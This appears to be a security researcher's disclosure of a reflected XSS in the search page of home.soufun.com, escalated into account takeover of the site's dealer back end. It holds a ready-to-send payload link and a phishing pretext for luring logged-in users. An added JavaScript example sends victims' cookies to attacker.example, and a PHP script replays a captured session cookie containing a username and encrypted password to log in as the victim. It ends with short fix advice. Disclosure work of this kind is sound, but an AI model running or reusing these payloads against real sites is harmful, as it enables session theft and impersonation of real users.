The output of the search parameter is not strictly filtered, which gives a reflected XSS; from there a user's cookie can be stolen, and with it the user's information. I reported this "user login" vulnerability to wooyun twice and it was not accepted; the second review was rejected with the note that the problem does exist but is not harmful. I believe a reflected XSS can be exploited in a big way or a small way, so I dug deeper to see whether the impact of this vulnerability could be magnified.

(1) Find the target link for the XSS: http://home.soufun.com/jiancai/SearchList.aspx

Reproduction: enter <a href="http://www.wooyun.org">click to participate in the activity</a> into the search box on the target page. The reflected XSS fires under IE. For users who are not logged in there is no harm, but for a logged-in user look at what the cookie holds: the user name and the encrypted password are all in there. Cracking the encrypted password is out of scope here; instead, let us keep developing the vulnerability.

(2) Find a target, which is a matter of social engineering. Users who advertise house-decoration services are easy to find, for example: http://home.soufun.com/shop/40794726/ . Send that user the following link (the q parameter is the URL-encoded <a><img onerror=...></a> payload; /***/ stands in for the space before onerror, and the %B5%E3%BB%F7%B2%CE%BC%D3%BB%EE%B6%AF bytes are the GBK encoding of the link text "click to participate in the activity"):

http://home.soufun.com/jiancai/SearchList.aspx?Level=1&q=%3Ca+href%3D%22http%3A%2F%2Fwww.wooyun.org%22%3E%3Cimg+src%3D%22%23%22%2F***%2Fonerror%3Dalert%28document.cookie%29+width%3D100%3E%B5%E3%BB%F7%B2%CE%BC%D3%BB%EE%B6%AF%3C%2Fa%3E&category=&x=57&y=14

under a pretext such as "Soufun is running a promotion". If the user is currently logged in to the decoration-helper back end and opens this link, congratulations, the user has been hit by the reflected XSS. Now, what if the payload does not alert the cookie but sends it to us instead? What is the damage?
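Step (2) stops at alert(document.cookie). The block below is an added example, not code from the original report: the same payload rewritten so that the victim's browser beacons the cookie to an attacker-controlled collector, plus an offline Node.js stand-in for the victim's browser that executes the reflected onerror handler. The collector http://attacker.example/c, the function names and the sample cookie are assumptions; the report's link text was GBK-encoded Chinese, plain ASCII is used here.

```javascript
// Added example (not from the original report): cookie exfiltration via the
// step (2) reflected XSS, simulated offline. http://attacker.example/c is an
// assumed attacker-controlled endpoint; it does not appear on the page.

const TARGET = 'http://home.soufun.com/jiancai/SearchList.aspx'; // reflecting endpoint from the report
const COLLECTOR = 'http://attacker.example/c';                    // assumption: attacker's log server

// Handler that runs in the victim's browser: a single GET request whose query
// string carries the complete document.cookie, no user interaction needed.
function exfilHandler(collector) {
  return `new Image().src='${collector}?c='+encodeURIComponent(document.cookie)`;
}

// HTML the vulnerable page reflects unencoded. "/***/" replaces the space
// before onerror, as the report's URL does (%2F***%2F); src="#" cannot load,
// so onerror always fires. The handler is double-quoted because it contains
// spaces and an unquoted attribute value would end at the first one.
function buildPayloadHtml(collector, linkText) {
  return `<a href="http://www.wooyun.org"><img src="#"/***/onerror="${exfilHandler(collector)}" width=100>${linkText}</a>`;
}

// Form-encode the payload into q, as in the report's link (spaces become '+').
function buildAttackUrl(collector, linkText) {
  const q = encodeURIComponent(buildPayloadHtml(collector, linkText)).replace(/%20/g, '+');
  return `${TARGET}?Level=1&q=${q}&category=&x=57&y=14`;
}

// Pull the onerror handler back out of the reflected HTML.
function extractOnerror(html) {
  const m = /onerror="([^"]*)"/.exec(html);
  return m ? m[1] : null;
}

// Stand-in for the victim's browser: the server echoes q verbatim, the image
// fails, and the handler runs with a fake Image (whose src assignment is the
// outgoing request) and a fake document holding the victim's cookie.
// Returns the URL the attacker's collector would receive.
function simulateVictim(attackUrl, victimCookie) {
  const reflected = new URL(attackUrl).searchParams.get('q');
  const handler = extractOnerror(reflected);
  if (handler === null) throw new Error('no onerror handler reflected');
  const requests = [];
  class FakeImage { set src(u) { requests.push(u); } }
  new Function('Image', 'document', handler)(FakeImage, { cookie: victimCookie });
  return requests[0];
}

// Constructed sample cookie in the shape of the one shown in step (1).
const demoCookie = 'passport=usertype=1&userid=42545987&username=testxss89; homezxb=sogo_dealerid=64451';
console.log(simulateVictim(buildAttackUrl(COLLECTOR, 'click to participate in the activity'), demoCookie));
```

Running it with node prints the one request the collector receives; the whole cookie string, passport fields included, is in its query, which is all the PHP replay script below needs.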
(3) Suppose we have captured the user's cookie through the XSS in step (2) (in practice it is trivial to collect: one HTTP request carrying document.cookie to a server we control). We can then run the following script and see what happens:
```php
<?php
// Split a raw "k=v; k2=v2" cookie string and set each cookie on the current
// response, scoped to soufun.com. The curl requests below send the raw header
// themselves, so this only matters if the script is served under that domain.
function explode_cookie($cookie) {
    $cookie_arr = explode(";", $cookie);
    foreach ($cookie_arr as $cookie_str) {
        // limit 2: the passport value itself contains '=' characters
        list($cookie_key, $cookie_value) = explode("=", trim($cookie_str), 2);
        $cookie_key = trim($cookie_key);
        setcookie($cookie_key, $cookie_value, time() + 1800, '/', 'soufun.com');
    }
}

// Rewrite root-relative links in the fetched HTML so the mirrored back-end
// pages still resolve when rendered from this script.
function url_replace($str) {
    $pattern_var = "/href=(['\"])\//";
    $replace_var = "href=$1http://dianpu.soufun.com/";
    if (preg_match($pattern_var, $str)) {
        $str = preg_replace($pattern_var, $replace_var, $str);
    }
    return $str;
}

// Frames of the decoration-helper (dealer) back end.
$admin_url = array(
    "http://dianpu.soufun.com/jiancai/dealer/top.aspx",
    "http://dianpu.soufun.com/jiancai/dealer/left.aspx",
    "http://dianpu.soufun.com/index.aspx",
);

// Cookie string captured from the test account via the XSS in step (2).
$cookie = "unique_cookie=U_b8nnhkz09nmlasskytp5f3ymg54hk50614w*12; __utmc=77873355; jiatxShopWindow=1; global_cookie=b8nnhkz09nmlasskytp5f3ymg54hk50614w; __utma=77873355.1662561517.1376029049.1376029049.1376037185.2; __utmb=77873355.9.10.1376037185; __utmz=77873355.1376029049.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); passport=usertype=1&userid=42545987&username=testxss89&password=381F5D8A96DFF049&isvalid=6BB50273C1F61D91962B0E259B086163&validation=6BB50273C1F61D912EC3FE322B6620E8917B57BF3DAD9B00; homezxb=sogo_dealerid=64451&Sogo_validation=C89DBE9F840476F053AEB80D5B7645B30D8754A1447B3A21&home_weike_userid=-64451&home_weike_user_validation=C89DBE9F840476F037BB50C741626714147ECDCB693EE44F; rememberRightname=testxss89";

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
explode_cookie($cookie);
foreach ($admin_url as $url) {
    // Replay the stolen cookie verbatim; the server treats it as a valid login.
    $header = array("Cookie: {$cookie}");
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    $data = curl_exec($ch);
    echo url_replace($data);
}
curl_close($ch);
```
The script above replays the stolen cookie in HTTP requests to the decoration-helper back end. The normal back end looks like this: and the back end after the simulated login looks like this:
As you can see, I am now logged in as that user. So what else is off limits? This vulnerability leaves a lot to the imagination; whatever the severity rating, we hope it is fixed as soon as possible.
Solution:
(1) Do not rely on the cookie alone to prove identity; tie it to a server-side session so that the cookie stops working once the session ends. (2) Fix the XSS by encoding the reflected q parameter on output.